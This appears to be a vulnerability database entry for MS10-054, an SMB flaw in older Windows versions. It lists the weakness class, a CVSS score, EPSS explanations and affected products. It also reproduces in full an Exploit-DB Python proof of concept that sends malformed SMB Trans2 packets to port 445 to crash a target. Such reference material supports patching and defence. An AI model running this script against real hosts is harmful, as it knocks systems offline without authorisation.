Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-20 |
Improper Input Validation The product receives input or data, but it does
not validate or incorrectly validates that the input has the
properties that are required to process the data safely and
correctly. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
10 |
|
AV:N/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 14607
Publication date : 2010-08-09 22h00 +00:00
Author : laurent gaffie
EDB Verified : Yes
#!/usr/bin/env python
import sys,struct,socket
from socket import *
if len(sys.argv)<=2:
print '#######################################################################'
print '# MS10-054 Proof Of Concept by Laurent Gaffie'
print '# Usage: python '+sys.argv[0]+' TARGET SHARE-NAME (No backslash)'
print '# Example: python '+sys.argv[0]+' 192.168.8.101 users'
print '# http://g-laurent.blogspot.com/'
print '# http://twitter.com/laurentgaffie'
print '# Email: laurent.gaffie{at}gmail{dot}com'
print '#######################################################################\n\n'
sys.exit()
host = str(sys.argv[1]),445
packetnego = "\x00\x00\x00\x9a"
packetnego += "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packetnego += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc3\x15\x00\x00\x01\x3d"
packetnego += "\x00\x77\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
packetnego += "\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4d\x49\x43\x52"
packetnego += "\x4f\x53\x4f\x46\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x33"
packetnego += "\x2e\x30\x00\x02\x44\x4f\x53\x20\x4c\x4d\x31\x2e\x32\x58\x30\x30"
packetnego += "\x32\x00\x02\x44\x4f\x53\x20\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31"
packetnego += "\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f"
packetnego += "\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4e"
packetnego += "\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"
def tidpiduidfield(data):
all_=data[28:34]
return all_
def handle(data):
##Chained SMB commands; Session Setup AndX Request,Tree connect
if data[8:10] == "\x72\x00":
sharename = "\x00\x00\x5c\x5c\x5c"+str(sys.argv[2])+"\x00\x3f\x3f\x3f\x3f\x3f\x00"
packetsession = "\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
packetsession += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd5\x15\x01\x00\x81\x2f"
packetsession += "\x0d\x75\x00\x7a\x00\x68\x0b\x32\x00\x00\x00\x00\x00\x00\x00\x18"
packetsession += "\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x3d\x00\x01\x01\x01"
packetsession += "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
packetsession += "\x01\x01\x01\x01\x01\x59\x4f\x00\x57\x4f\x52\x4b\x47\x52\x4f\x55"
packetsession += "\x50\x00\x57\x69\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x57\x69"
packetsession += "\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x04\xff\x00\x00\x00\x00"
packetsession += "\x00\x01\x00"+struct.pack(">i", len(sharename))[3:4]+sharename
print "[+]Session Query sent"
return struct.pack(">i", len(packetsession))+packetsession
##Trans2, Request, QUERY_FS_INFO Query FS Attribute Info
if data[8:10] == "\x73\x00":
packetrans = "\x00\x00\x00\x46"
packetrans += "\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x01\xc8\x00\x00\x00\x00"
packetrans += "\x00\x00\x00\x00\x00\x00\x00\x00"+tidpiduidfield(data)+"\x13\x00"
packetrans += "\x0f\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packetrans += "\x00\x00\x00\x02\x00\x44\x00\x00\x00\x46\x00\x01\x00\x03\x00\x05"
packetrans += "\x00\x00\x44\x20\x05\x01"
print "[+]Malformed Trans2 packet sent\n[+]The target should be down now"
return packetrans
def run():
s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.settimeout(2)
s.send(packetnego)
print "[+]Negotiate Protocol Request sent"
try:
while True:
data = s.recv(1024)
s.send(handle(data))
except Exception:
pass
s.close()
run()
Products Mentioned
Configuraton 0
Microsoft>>Windows_2003_server >> Version *
Microsoft>>Windows_2003_server >> Version *
Microsoft>>Windows_7 >> Version *
Microsoft>>Windows_7 >> Version -
Microsoft>>Windows_server_2003 >> Version *
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version -
Microsoft>>Windows_vista >> Version *
Microsoft>>Windows_vista >> Version *
Microsoft>>Windows_vista >> Version -
Microsoft>>Windows_xp >> Version *
Microsoft>>Windows_xp >> Version -
References